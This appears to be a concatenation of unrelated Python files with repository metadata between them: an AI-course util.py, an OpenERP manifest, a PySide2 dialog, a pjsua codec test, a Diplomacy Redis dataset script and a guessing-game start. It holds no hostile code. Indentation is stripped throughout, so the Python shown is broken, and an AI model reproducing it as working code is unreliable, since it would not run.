3421383928L, 3116950429L, 2165882425L, 2346928266L, 2892678711L, 2936066049L, 1316407868L, \
2873411858L, 4279682888L, 2744351923L, 3290373816L, 1014377279L, 955200944L, 4220990860L, \
2386098930L, 1772997650L, 3757346974L, 1621616438L, 2877097197L, 442116595L, 2010480266L, \
2867861469L, 2955352695L, 605335967L, 2222936009L, 2067554933L, 4129906358L, 1519608541L, \
1195006590L, 1942991038L, 2736562236L, 279162408L, 1415982909L, 4099901426L, 1732201505L, \
2934657937L, 860563237L, 2479235483L, 3081651097L, 2244720867L, 3112631622L, 1636991639L, \
3860393305L, 2312061927L, 48780114L, 1149090394L, 2643246550L, 1764050647L, 3836789087L, \
3474859076L, 4237194338L, 1735191073L, 2150369208L, 92164394L, 756974036L, 2314453957L, \
323969533L, 4267621035L, 283649842L, 810004843L, 727855536L, 1757827251L, 3334960421L, \
3261035106L, 38417393L, 2660980472L, 1256633965L, 2184045390L, 811213141L, 2857482069L, \
2237770878L, 3891003138L, 2787806886L, 2435192790L, 2249324662L, 3507764896L, 995388363L, \
856944153L, 619213904L, 3233967826L, 3703465555L, 3286531781L, 3863193356L, 2992340714L, \
413696855L, 3865185632L, 1704163171L, 3043634452L, 2225424707L, 2199018022L, 3506117517L, \
3311559776L, 3374443561L, 1207829628L, 668793165L, 1822020716L, 2082656160L, 1160606415L, \
3034757648L, 741703672L, 3094328738L, 459332691L, 2702383376L, 1610239915L, 4162939394L, \
557861574L, 3805706338L, 3832520705L, 1248934879L, 3250424034L, 892335058L, 74323433L, \
3209751608L, 3213220797L, 3444035873L, 3743886725L, 1783837251L, 610968664L, 580745246L, \
4041979504L, 201684874L, 2673219253L, 1377283008L, 3497299167L, 2344209394L, 2304982920L, \
3081403782L, 2599256854L, 3184475235L, 3373055826L, 695186388L, 2423332338L, 222864327L, \
1258227992L, 3627871647L, 3487724980L, 4027953808L, 3053320360L, 533627073L, 3026232514L, \
2340271949L, 867277230L, 868513116L, 2158535651L, 2487822909L, 3428235761L, 3067196046L, \
3435119657L, 1908441839L, 788668797L, 3367703138L, 3317763187L, 908264443L, 2252100381L, \
764223334L, 4127108988L, 384641349L, 3377374722L, 1263833251L, 1958694944L, 3847832657L, \
1253909612L, 1096494446L, 555725445L, 2277045895L, 3340096504L, 1383318686L, 4234428127L, \
1072582179L, 94169494L, 1064509968L, 2681151917L, 2681864920L, 734708852L, 1338914021L, \
1270409500L, 1789469116L, 4191988204L, 1716329784L, 2213764829L, 3712538840L, 919910444L, \
1318414447L, 3383806712L, 3054941722L, 3378649942L, 1205735655L, 1268136494L, 2214009444L, \
2532395133L, 3232230447L, 230294038L, 342599089L, 772808141L, 4096882234L, 3146662953L, \
2784264306L, 1860954704L, 2675279609L, 2984212876L, 2466966981L, 2627986059L, 2985545332L, \
2578042598L, 1458940786L, 2944243755L, 3959506256L, 1509151382L, 325761900L, 942251521L, \
4184289782L, 2756231555L, 3297811774L, 1169708099L, 3280524138L, 3805245319L, 3227360276L, \
3199632491L, 2235795585L, 2865407118L, 36763651L, 2441503575L, 3314890374L, 1755526087L, \
17915536L, 1196948233L, 949343045L, 3815841867L, 489007833L, 2654997597L, 2834744136L, \
417688687L, 2843220846L, 85621843L, 747339336L, 2043645709L, 3520444394L, 1825470818L, \
647778910L, 275904777L, 1249389189L, 3640887431L, 4200779599L, 323384601L, 3446088641L, \
4049835786L, 1718989062L, 3563787136L, 44099190L, 3281263107L, 22910812L, 1826109246L, \
745118154L, 3392171319L, 1571490704L, 354891067L, 815955642L, 1453450421L, 940015623L, \
796817754L, 1260148619L, 3898237757L, 176670141L, 1870249326L, 3317738680L, 448918002L, \
4059166594L, 2003827551L, 987091377L, 224855998L, 3520570137L, 789522610L, 2604445123L, \
454472869L, 475688926L, 2990723466L, 523362238L, 3897608102L, 806637149L, 2642229586L, \
2928614432L, 1564415411L, 1691381054L, 3816907227L, 4082581003L, 1895544448L, 3728217394L, \
3214813157L, 4054301607L, 1882632454L, 2873728645L, 3694943071L, 1297991732L, 2101682438L, \
3952579552L, 678650400L, 1391722293L, 478833748L, 2976468591L, 158586606L, 2576499787L, \
662690848L, 3799889765L, 3328894692L, 2474578497L, 2383901391L, 1718193504L, 3003184595L, \
3630561213L, 1929441113L, 3848238627L, 1594310094L, 3040359840L, 3051803867L, 2462788790L, \
954409915L, 802581771L, 681703307L, 545982392L, 2738993819L, 8025358L, 2827719383L, \
770471093L, 3484895980L, 3111306320L, 3900000891L, 2116916652L, 397746721L, 2087689510L, \
721433935L, 1396088885L, 2751612384L, 1998988613L, 2135074843L, 2521131298L, 707009172L, \
2398321482L, 688041159L, 2264560137L, 482388305L, 207864885L, 3735036991L, 3490348331L, \
1963642811L, 3260224305L, 3493564223L, 1939428454L, 1128799656L, 1366012432L, 2858822447L, \
1428147157L, 2261125391L, 1611208390L, 1134826333L, 2374102525L, 3833625209L, 2266397263L, \
3189115077L, 770080230L, 2674657172L, 4280146640L, 3604531615L, 4235071805L, 3436987249L, \
509704467L, 2582695198L, 4256268040L, 3391197562L, 1460642842L, 1617931012L, 457825497L, \
1031452907L, 1330422862L, 4125947620L, 2280712485L, 431892090L, 2387410588L, 2061126784L, \
896457479L, 3480499461L, 2488196663L, 4021103792L, 1877063114L, 2744470201L, 1046140599L, \
2129952955L, 3583049218L, 4217723693L, 2720341743L, 820661843L, 1079873609L, 3360954200L, \
3652304997L, 3335838575L, 2178810636L, 1908053374L, 4026721976L, 1793145418L, 476541615L, \
973420250L, 515553040L, 919292001L, 2601786155L, 1685119450L, 3030170809L, 1590676150L, \
1665099167L, 651151584L, 2077190587L, 957892642L, 646336572L, 2743719258L, 866169074L, \
851118829L, 4225766285L, 963748226L, 799549420L, 1955032629L, 799460000L, 2425744063L, \
2441291571L, 1928963772L, 528930629L, 2591962884L, 3495142819L, 1896021824L, 901320159L, \
3181820243L, 843061941L, 3338628510L, 3782438992L, 9515330L, 1705797226L, 953535929L, \
764833876L, 3202464965L, 2970244591L, 519154982L, 3390617541L, 566616744L, 3438031503L, \
1853838297L, 170608755L, 1393728434L, 676900116L, 3184965776L, 1843100290L, 78995357L, \
2227939888L, 3460264600L, 1745705055L, 1474086965L, 572796246L, 4081303004L, 882828851L, \
1295445825L, 137639900L, 3304579600L, 2722437017L, 4093422709L, 273203373L, 2666507854L, \
3998836510L, 493829981L, 1623949669L, 3482036755L, 3390023939L, 833233937L, 1639668730L, \
1499455075L, 249728260L, 1210694006L, 3836497489L, 1551488720L, 3253074267L, 3388238003L, \
2372035079L, 3945715164L, 2029501215L, 3362012634L, 2007375355L, 4074709820L, 631485888L, \
3135015769L, 4273087084L, 3648076204L, 2739943601L, 1374020358L, 1760722448L, 3773939706L, \
1313027823L, 1895251226L, 4224465911L, 421382535L, 1141067370L, 3660034846L, 3393185650L, \
1850995280L, 1451917312L, 3841455409L, 3926840308L, 1397397252L, 2572864479L, 2500171350L, \
3119920613L, 531400869L, 1626487579L, 1099320497L, 407414753L, 2438623324L, 99073255L, \
3175491512L, 656431560L, 1153671785L, 236307875L, 2824738046L, 2320621382L, 892174056L, \
230984053L, 719791226L, 2718891946L, 624L), None)
self.random = random.Random()
self.random.setstate(fixedState)
"""
Data structures useful for implementing SearchAgents
"""
class Stack:
"A container with a last-in-first-out (LIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Push 'item' onto the stack"
self.list.append(item)
def pop(self):
"Pop the most recently pushed item from the stack"
return self.list.pop()
def isEmpty(self):
"Returns true if the stack is empty"
return len(self.list) == 0
class Queue:
"A container with a first-in-first-out (FIFO) queuing policy."
def __init__(self):
self.list = []
def push(self,item):
"Enqueue the 'item' into the queue"
self.list.insert(0,item)
def pop(self):
"""
Dequeue the earliest enqueued item still in the queue. This
operation removes the item from the queue.
"""
return self.list.pop()
def isEmpty(self):
"Returns true if the queue is empty"
return len(self.list) == 0
class PriorityQueue:
"""
Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
Note that this PriorityQueue does not allow you to change the priority
of an item. However, you may insert the same item multiple times with
different priorities.
"""
def __init__(self):
self.heap = []
self.count = 0
def push(self, item, priority):
# FIXME: restored old behaviour to check against old results better
# FIXED: restored to stable behaviour
entry = (priority, self.count, item)
# entry = (priority, item)
heapq.heappush(self.heap, entry)
self.count += 1
def pop(self):
(_, _, item) = heapq.heappop(self.heap)
# (_, item) = heapq.heappop(self.heap)
return item
def isEmpty(self):
return len(self.heap) == 0
class PriorityQueueWithFunction(PriorityQueue):
"""
Implements a priority queue with the same push/pop signature of the
Queue and the Stack classes. This is designed for drop-in replacement for
those two classes. The caller has to provide a priority function, which
extracts each item's priority.
"""
def __init__(self, priorityFunction):
"priorityFunction (item) -> priority"
self.priorityFunction = priorityFunction # store the priority function
PriorityQueue.__init__(self) # super-class initializer
def push(self, item):
"Adds an item to the queue with priority from the priority function"
PriorityQueue.push(self, item, self.priorityFunction(item))
def manhattanDistance( xy1, xy2 ):
"Returns the Manhattan distance between points xy1 and xy2"
return abs( xy1[0] - xy2[0] ) + abs( xy1[1] - xy2[1] )
"""
Data structures and functions useful for various course projects
The search project should not need anything below this line.
"""
class Counter(dict):
"""
A counter keeps track of counts for a set of keys.
The counter class is an extension of the standard python
dictionary type. It is specialized to have number values
(integers or floats), and includes a handful of additional
functions to ease the task of counting data. In particular,
all keys are defaulted to have value 0. Using a dictionary:
a = {}
print a['test']
would give an error, while the Counter class analogue:
>>> a = Counter()
>>> print a['test']
0
returns the default 0 value. Note that to reference a key
that you know is contained in the counter,
you can still use the dictionary syntax:
>>> a = Counter()
>>> a['test'] = 2
>>> print a['test']
2
This is very useful for counting things without initializing their counts,
see for example:
>>> a['blah'] += 1
>>> print a['blah']
1
The counter also includes additional functionality useful in implementing
the classifiers for this assignment. Two counters can be added,
subtracted or multiplied together. See below for details. They can
also be normalized and their total count and arg max can be extracted.
"""
def __getitem__(self, idx):
self.setdefault(idx, 0)
return dict.__getitem__(self, idx)
def incrementAll(self, keys, count):
"""
Increments all elements of keys by the same count.
>>> a = Counter()
>>> a.incrementAll(['one','two', 'three'], 1)
>>> a['one']
1
>>> a['two']
1
"""
for key in keys:
self[key] += count
def argMax(self):
"""
Returns the key with the highest value.
"""
if len(self.keys()) == 0: return None
all = self.items()
values = [x[1] for x in all]
maxIndex = values.index(max(values))
return all[maxIndex][0]
def sortedKeys(self):
"""
Returns a list of keys sorted by their values. Keys
with the highest values will appear first.
>>> a = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> a['third'] = 1
>>> a.sortedKeys()
['second', 'third', 'first']
"""
sortedItems = self.items()
compare = lambda x, y: sign(y[1] - x[1])
sortedItems.sort(cmp=compare)
return [x[0] for x in sortedItems]
def totalCount(self):
"""
Returns the sum of counts for all keys.
"""
return sum(self.values())
def normalize(self):
"""
Edits the counter such that the total count of all
keys sums to 1. The ratio of counts for all keys
will remain the same. Note that normalizing an empty
Counter will result in an error.
"""
total = float(self.totalCount())
if total == 0: return
for key in self.keys():
self[key] = self[key] / total
def divideAll(self, divisor):
"""
Divides all counts by divisor
"""
divisor = float(divisor)
for key in self:
self[key] /= divisor
def copy(self):
"""
Returns a copy of the counter
"""
return Counter(dict.copy(self))
def __mul__(self, y ):
"""
Multiplying two counters gives the dot product of their vectors where
each unique label is a vector element.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['second'] = 5
>>> a['third'] = 1.5
>>> a['fourth'] = 2.5
>>> a * b
14
"""
sum = 0
x = self
if len(x) > len(y):
x,y = y,x
for key in x:
if key not in y:
continue
sum += x[key] * y[key]
return sum
def __radd__(self, y):
"""
Adding another counter to a counter increments the current counter
by the values stored in the second counter.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> a += b
>>> a['first']
1
"""
for key, value in y.items():
self[key] += value
def __add__( self, y ):
"""
Adding two counters gives a counter with the union of all keys and
counts of the second added to counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a + b)['first']
1
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] + y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = y[key]
return addend
def __sub__( self, y ):
"""
Subtracting a counter from another gives a counter with the union of all keys and
counts of the second subtracted from counts of the first.
>>> a = Counter()
>>> b = Counter()
>>> a['first'] = -2
>>> a['second'] = 4
>>> b['first'] = 3
>>> b['third'] = 1
>>> (a - b)['first']
-5
"""
addend = Counter()
for key in self:
if key in y:
addend[key] = self[key] - y[key]
else:
addend[key] = self[key]
for key in y:
if key in self:
continue
addend[key] = -1 * y[key]
return addend
def raiseNotDefined():
fileName = inspect.stack()[1][1]
line = inspect.stack()[1][2]
method = inspect.stack()[1][3]
print "*** Method not implemented: %s at line %s of %s" % (method, line, fileName)
sys.exit(1)
def normalize(vectorOrCounter):
"""
normalize a vector or counter by dividing each value by the sum of all values
"""
normalizedCounter = Counter()
if type(vectorOrCounter) == type(normalizedCounter):
counter = vectorOrCounter
total = float(counter.totalCount())
if total == 0: return counter
for key in counter.keys():
value = counter[key]
normalizedCounter[key] = value / total
return normalizedCounter
else:
vector = vectorOrCounter
s = float(sum(vector))
if s == 0: return vector
return [el / s for el in vector]
def nSample(distribution, values, n):
if sum(distribution) != 1:
distribution = normalize(distribution)
rand = [random.random() for i in range(n)]
rand.sort()
samples = []
samplePos, distPos, cdf = 0,0, distribution[0]
while samplePos < n:
if rand[samplePos] < cdf:
samplePos += 1
samples.append(values[distPos])
else:
distPos += 1
cdf += distribution[distPos]
return samples
def sample(distribution, values = None):
if type(distribution) == Counter:
items = sorted(distribution.items())
distribution = [i[1] for i in items]
values = [i[0] for i in items]
if sum(distribution) != 1:
distribution = normalize(distribution)
choice = random.random()
i, total= 0, distribution[0]
while choice > total:
i += 1
total += distribution[i]
return values[i]
def sampleFromCounter(ctr):
items = sorted(ctr.items())
return sample([v for k,v in items], [k for k,v in items])
def getProbability(value, distribution, values):
"""
Gives the probability of a value under a discrete distribution
defined by (distributions, values).
"""
total = 0.0
for prob, val in zip(distribution, values):
if val == value:
total += prob
return total
def flipCoin( p ):
r = random.random()
return r < p
def chooseFromDistribution( distribution ):
"Takes either a counter or a list of (prob, key) pairs and samples"
if type(distribution) == dict or type(distribution) == Counter:
return sample(distribution)
r = random.random()
base = 0.0
for prob, element in distribution:
base += prob
if r <= base: return element
def nearestPoint( pos ):
"""
Finds the nearest grid point to a position (discretizes).
"""
( current_row, current_col ) = pos
grid_row = int( current_row + 0.5 )
grid_col = int( current_col + 0.5 )
return ( grid_row, grid_col )
def sign( x ):
"""
Returns 1 or -1 depending on the sign of x
"""
if( x >= 0 ):
return 1
else:
return -1
def arrayInvert(array):
"""
Inverts a matrix stored as a list of lists.
"""
result = [[] for i in array]
for outer in array:
for inner in range(len(outer)):
result[inner].append(outer[inner])
return result
def matrixAsList( matrix, value = True ):
"""
Turns a matrix into a list of coordinates matching the specified value
"""
rows, cols = len( matrix ), len( matrix[0] )
cells = []
for row in range( rows ):
for col in range( cols ):
if matrix[row][col] == value:
cells.append( ( row, col ) )
return cells
def lookup(name, namespace):
"""
Get a method or class from any imported module from its name.
Usage: lookup(functionName, globals())
"""
dots = name.count('.')
if dots > 0:
moduleName, objName = '.'.join(name.split('.')[:-1]), name.split('.')[-1]
module = __import__(moduleName)
return getattr(module, objName)
else:
modules = [obj for obj in namespace.values() if str(type(obj)) == "<type 'module'>"]
options = [getattr(module, name) for module in modules if name in dir(module)]
options += [obj[1] for obj in namespace.items() if obj[0] == name ]
if len(options) == 1: return options[0]
if len(options) > 1: raise Exception, 'Name conflict for %s'
raise Exception, '%s not found as a method or class' % name
def pause():
"""
Pauses the output stream awaiting user feedback.
"""
print "<Press enter/return to continue>"
raw_input()
# code to handle timeouts
#
# FIXME
# NOTE: TimeoutFuncton is NOT reentrant. Later timeouts will silently
# disable earlier timeouts. Could be solved by maintaining a global list
# of active time outs. Currently, questions which have test cases calling
# this have all student code so wrapped.
#
import signal
import time
class TimeoutFunctionException(Exception):
"""Exception to raise on a timeout"""
pass
class TimeoutFunction:
def __init__(self, function, timeout):
self.timeout = timeout
self.function = function
def handle_timeout(self, signum, frame):
raise TimeoutFunctionException()
def __call__(self, *args, **keyArgs):
# If we have SIGALRM signal, use it to cause an exception if and
# when this function runs too long. Otherwise check the time taken
# after the method has returned, and throw an exception then.
if hasattr(signal, 'SIGALRM'):
old = signal.signal(signal.SIGALRM, self.handle_timeout)
signal.alarm(self.timeout)
try:
result = self.function(*args, **keyArgs)
finally:
signal.signal(signal.SIGALRM, old)
signal.alarm(0)
else:
startTime = time.time()
result = self.function(*args, **keyArgs)
timeElapsed = time.time() - startTime
if timeElapsed >= self.timeout:
self.handle_timeout(None, None)
return result
_ORIGINAL_STDOUT = None
_ORIGINAL_STDERR = None
_MUTED = False
class WritableNull:
def write(self, string):
pass
def mutePrint():
global _ORIGINAL_STDOUT, _ORIGINAL_STDERR, _MUTED
if _MUTED:
return
_MUTED = True
_ORIGINAL_STDOUT = sys.stdout
#_ORIGINAL_STDERR = sys.stderr
sys.stdout = WritableNull()
#sys.stderr = WritableNull()
def unmutePrint():
global _ORIGINAL_STDOUT, _ORIGINAL_STDERR, _MUTED
if not _MUTED:
return
_MUTED = False
sys.stdout = _ORIGINAL_STDOUT
#sys.stderr = _ORIGINAL_STDERR
|
omardroubi/Artificial-Intelligence
|
Projects/Project4/bayesNets/util.py
|
Python
|
apache-2.0
| 25,733 | 0.014728 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Attendances',
'version': '1.1',
'category': 'Human Resources',
'description': """
This module aims to manage employee's attendances.
==================================================
Keeps account of the attendances of the employees on the basis of the
actions(Sign in/Sign out) performed by them.
""",
'author': 'OpenERP SA',
'images': ['images/hr_attendances.jpeg'],
'depends': ['hr'],
'data': [
'security/ir_rule.xml',
'security/ir.model.access.csv',
'hr_attendance_view.xml',
'hr_attendance_report.xml',
'wizard/hr_attendance_bymonth_view.xml',
'wizard/hr_attendance_byweek_view.xml',
'wizard/hr_attendance_error_view.xml',
'res_config_view.xml',
],
'demo': ['hr_attendance_demo.xml'],
'test': [
'test/attendance_process.yml',
'test/hr_attendance_report.yml',
],
'installable': True,
'auto_install': False,
#web
"js": ["static/src/js/attendance.js"],
'qweb' : ["static/src/xml/attendance.xml"],
'css' : ["static/src/css/slider.css"],
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
inovtec-solutions/OpenERP
|
openerp/addons/hr_attendance/__openerp__.py
|
Python
|
agpl-3.0
| 2,163 | 0.001849 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'replace_with_ref_dialog_ui.ui'
#
# Created: Fri Nov 18 22:58:33 2016
# by: pyside2-uic running on PySide2 2.0.0~alpha0
#
# WARNING! All changes made in this file will be lost!
from PySide2 import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(520, 174)
self.verticalLayout = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout.setContentsMargins(6, 6, 6, 6)
self.verticalLayout.setObjectName("verticalLayout")
self.groupBox = QtWidgets.QGroupBox(Dialog)
self.groupBox.setTitle("")
self.groupBox.setObjectName("groupBox")
self.horizontalLayout = QtWidgets.QHBoxLayout(self.groupBox)
self.horizontalLayout.setObjectName("horizontalLayout")
self.uiLBL_text = QtWidgets.QLabel(self.groupBox)
self.uiLBL_text.setTextFormat(QtCore.Qt.RichText)
self.uiLBL_text.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.uiLBL_text.setWordWrap(True)
self.uiLBL_text.setObjectName("uiLBL_text")
self.horizontalLayout.addWidget(self.uiLBL_text)
self.verticalLayout.addWidget(self.groupBox)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.uiBTN_saveReplace = QtWidgets.QPushButton(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.uiBTN_saveReplace.sizePolicy().hasHeightForWidth())
self.uiBTN_saveReplace.setSizePolicy(sizePolicy)
self.uiBTN_saveReplace.setObjectName("uiBTN_saveReplace")
self.horizontalLayout_2.addWidget(self.uiBTN_saveReplace)
self.uiBTN_replace = QtWidgets.QPushButton(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.uiBTN_replace.sizePolicy().hasHeightForWidth())
self.uiBTN_replace.setSizePolicy(sizePolicy)
self.uiBTN_replace.setObjectName("uiBTN_replace")
self.horizontalLayout_2.addWidget(self.uiBTN_replace)
self.uiBTN_cancel = QtWidgets.QPushButton(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.uiBTN_cancel.sizePolicy().hasHeightForWidth())
self.uiBTN_cancel.setSizePolicy(sizePolicy)
self.uiBTN_cancel.setObjectName("uiBTN_cancel")
self.horizontalLayout_2.addWidget(self.uiBTN_cancel)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.horizontalLayout_2.setStretch(1, 1)
self.horizontalLayout_2.setStretch(2, 1)
self.horizontalLayout_2.setStretch(3, 1)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.verticalLayout.setStretch(0, 1)
self.retranslateUi(Dialog)
QtCore.QObject.connect(self.uiBTN_saveReplace, QtCore.SIGNAL("clicked()"), Dialog.onSaveReplaceClicked)
QtCore.QObject.connect(self.uiBTN_replace, QtCore.SIGNAL("clicked()"), Dialog.onReplaceClicked)
QtCore.QObject.connect(self.uiBTN_cancel, QtCore.SIGNAL("clicked()"), Dialog.onCancelClicked)
QtCore.QObject.connect(Dialog, QtCore.SIGNAL("finished(int)"), Dialog.onDialogFinished)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtWidgets.QApplication.translate("Dialog", "Replace With Reference", None, -1))
self.uiLBL_text.setText(QtWidgets.QApplication.translate("Dialog", "Text", None, -1))
self.uiBTN_saveReplace.setText(QtWidgets.QApplication.translate("Dialog", "Save and Replace", None, -1))
self.uiBTN_replace.setText(QtWidgets.QApplication.translate("Dialog", "Replace", None, -1))
self.uiBTN_cancel.setText(QtWidgets.QApplication.translate("Dialog", "Cancel", None, -1))
|
theetcher/fxpt
|
fxpt/fx_refsystem/replace_with_ref_dialog_ui2.py
|
Python
|
mit
| 4,622 | 0.004976 |
# $Id: 201_codec_l16_16000.py 369517 2012-07-01 17:28:57Z file $
#
from inc_cfg import *
# Call with L16/16000/1 codec
test_param = TestParam(
"PESQ codec L16/16000/1 (RX side uses snd dev)",
[
InstanceParam("UA1", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --play-file wavs/input.16.wav --null-audio"),
InstanceParam("UA2", "--max-calls=1 --add-codec L16/16000/1 --clock-rate 16000 --rec-file wavs/tmp.16.wav --auto-answer 200")
]
)
if (HAS_SND_DEV == 0):
test_param.skip = True
pesq_threshold = 3.5
|
fluentstream/asterisk-p2p
|
res/pjproject/tests/pjsua/scripts-pesq/201_codec_l16_16000.py
|
Python
|
gpl-2.0
| 537 | 0.01676 |
# ==============================================================================
# Copyright 2019 - Philip Paquette
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" Redis dataset
- Populated the Redis server with the supervised games
- Saves the redis database on disk for faster boot time.
"""
import logging
import os
import pickle
import shutil
from threading import Thread
from tqdm import tqdm
from diplomacy_research.models.training.memory_buffer import MemoryBuffer
from diplomacy_research.models.training.memory_buffer.expert_games import save_expert_games
from diplomacy_research.proto.diplomacy_proto.game_pb2 import SavedGame as SavedGameProto
from diplomacy_research.utils.process import start_redis
from diplomacy_research.utils.proto import bytes_to_zlib, bytes_to_proto, read_next_bytes
from diplomacy_research.settings import PROTO_DATASET_PATH, REDIS_DATASET_PATH, WORKING_DIR, \
PHASES_COUNT_DATASET_PATH, IN_PRODUCTION
# Constants
LOGGER = logging.getLogger(__name__)
def run(**kwargs):
""" Run the script - Determines if we need to build the dataset or not. """
del kwargs # Unused args
if os.path.exists(REDIS_DATASET_PATH):
LOGGER.info('... Dataset already exists. Skipping.')
else:
build()
def build():
""" Building the Redis dataset """
if not os.path.exists(PROTO_DATASET_PATH):
raise RuntimeError('Unable to find the proto dataset at %s' % PROTO_DATASET_PATH)
# Creating output directory if it doesn't exist
os.makedirs(os.path.join(WORKING_DIR, 'containers', 'redis'), exist_ok=True)
# Starting the Redis server and blocking on that thread
redis_thread = Thread(target=start_redis, kwargs={'save_dir': os.path.join(WORKING_DIR, 'containers'),
'log_file_path': os.devnull,
'clear': True})
redis_thread.start()
# Creating a memory buffer object to save games in Redis
memory_buffer = MemoryBuffer()
memory_buffer.clear()
# Loading the phases count dataset to get the number of games
total = None
if os.path.exists(PHASES_COUNT_DATASET_PATH):
with open(PHASES_COUNT_DATASET_PATH, 'rb') as file:
total = len(pickle.load(file))
progress_bar = tqdm(total=total)
# Loading dataset and converting
LOGGER.info('... Creating redis dataset.')
with open(PROTO_DATASET_PATH, 'rb') as file:
while True:
saved_game_bytes = read_next_bytes(file)
if saved_game_bytes is None:
break
progress_bar.update(1)
saved_game_proto = bytes_to_proto(saved_game_bytes, SavedGameProto)
save_expert_games(memory_buffer, [bytes_to_zlib(saved_game_bytes)], [saved_game_proto.id])
# Saving
memory_buffer.save(sync=True)
# Moving file
redis_db_path = {True: '/work_dir/redis/saved_redis.rdb',
False: os.path.join(WORKING_DIR, 'containers', 'redis', 'saved_redis.rdb')}.get(IN_PRODUCTION)
shutil.move(redis_db_path, REDIS_DATASET_PATH)
LOGGER.info('... Done creating redis dataset.')
# Stopping Redis and thread
progress_bar.close()
memory_buffer.shutdown()
redis_thread.join(timeout=60)
|
diplomacy/research
|
diplomacy_research/scripts/dataset/dataset_010_redis.py
|
Python
|
mit
| 3,931 | 0.00407 |
#!/usr/bin/env python3
# vim: tw=76
import kxg
import random
import pyglet
LOWER_BOUND, UPPER_BOUND = 0, 5000
class World(kxg.World):
"""
Keep track of the secret number, the range of numbers that haven't been
eliminated yet, and the winner (if there is one).
"""
def __init__(self):
super().__init__()
self.number = 0
self.lower_bound = 0
self.upper_bound = 0
self.winner = 0
class Referee(kxg.Referee):
"""
Pick the secret number.
"""
def on_start_game(self, num_players):
number = random.randint(LOWER_BOUND + 1, UPPER_BOUND - 1)
self >> PickNumber(number, LOWER_BOUND, UPPER_BOUND)
class PickNumber(kxg.Message):
"""
Pick the secret number and communicate that choice to all the clients.
"""
def __init__(self, number, lower_bound, upper_bound):
self.number = number
self.lower_bound = lower_bound
self.upper_bound = upper_bound
def on_check(self, world):
if world.number:
raise kxg.MessageCheck("number already picked")
def on_execute(self, world):
world.number = self.number
world.lower_bound = self.lower_bound
world.upper_bound = self.upper_bound
class GuessNumber(kxg.Message):
"""
Make a guess on behalf of the given player. If the guess is
right, that player wins the game. If the guess is wrong, the
range of numbers that the secret number could be is narrowed
accordingly.
"""
def __init__(self, player, guess):
self.player = player
self.guess = guess
def on_check(self, world):
pass
def on_execute(self, world):
if self.guess == world.number:
world.winner = self.player
world.end_game()
elif self.guess < world.number:
world.lower_bound = max(self.guess, world.lower_bound)
elif self.guess > world.number:
world.upper_bound = min(self.guess, world.upper_bound)
class Gui:
"""
Manage GUI objects like the window, which exist before and after the game
itself.
"""
def __init__(self):
self.width, self.height = 600, 400
self.window = pyglet.window.Window()
self.window.set_size(self.width, self.height)
self.window.set_visible(True)
self.label = pyglet.text.Label(
"",
color=(255, 255, 255, 255),
font_name='Deja Vu Sans', font_size=32,
x=self.width//2, y=self.height//2,
anchor_x='center', anchor_y='center',
)
def on_refresh_gui(self):
self.window.clear()
self.label.draw()
